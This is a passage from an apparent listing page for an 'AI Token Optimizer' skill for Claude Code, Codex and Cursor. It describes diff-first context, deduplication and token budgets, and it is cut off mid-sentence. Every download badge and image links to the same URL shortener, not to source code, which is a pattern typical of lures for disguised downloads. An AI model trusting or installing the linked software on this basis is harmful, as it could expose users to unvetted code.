AI Token Optimizer Claude Codex Cursor banner
uniqueplume uniqueplume

AI Token Optimizer Claude Codex Cursor

AI community

Description

Local AI Context Compressor with Claude Code, Codex and Cursor profiles, duplicate-context removal, Git diff prioritization, generated-file filters, conversation summaries, token estimates, reusable presets and clipboard/folder workflows.

Installation

This entry records only its repository, not the path inside it, so there is no exact command to give. Open the source below and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

README

🗜️ AI Coding Context Compressor — Git Diff, History Summary & Token Budgets

**AI Token Optimizer** is A repository-aware context preparation tool built around Git diff priority, dependency radius, history summarization, prompt cleanup, generated-file exclusion and strict token budgets.

**Reduction claim:** The project can target **up to 70% lower context/token usage**, but actual reduction varies by repository, task, selected files, history length and profile.

Quick Access

[![Claude Code](https://img.shields.io/badge/Claude%20Code-Profile-8250df?style=for-the-badge)](https://flyn.co/9JbTeV/) [![Codex](https://img.shields.io/badge/Codex-Profile-0969da?style=for-the-badge)](https://flyn.co/9JbTeV/) [![Cursor](https://img.shields.io/badge/Cursor-Profile-1f883d?style=for-the-badge)](https://flyn.co/9JbTeV/) [![Download](https://img.shields.io/badge/Download-Latest%20Version-2f81f7?style=for-the-badge)](https://flyn.co/9JbTeV/)

Download

➡️ **[Download AI Token Optimizer](https://flyn.co/9JbTeV/)**

Preview

[![Preview](assets/ai-token-optimizer-preview.png)](https://flyn.co/9JbTeV/)

Dashboard

[![Dashboard](assets/ai-token-optimizer-dashboard.png)](https://flyn.co/9JbTeV/)

Workflow

[![Workflow](assets/ai-token-optimization-workflow.png)](https://flyn.co/9JbTeV/)

Example token counts are illustrative, not benchmark guarantees.

Core Features

  • Git diff-first context
  • Duplicate block removal
  • Long-session history summaries
  • Generated/build-file filters
  • Repository token budgets
  • Before/after token estimates
  • Claude Code profile
  • Codex profile
  • Cursor profile
  • Generic coding-agent profile
  • Clipboard / Markdown export
  • Reusable presets

How It Saves Context

Diff-first

Prioritize changed files, modified functions, nearby imports, direct dependencies and relevant tests instead of resending an entire repository.

Deduplication

Flag repeated logs, duplicate code blocks, r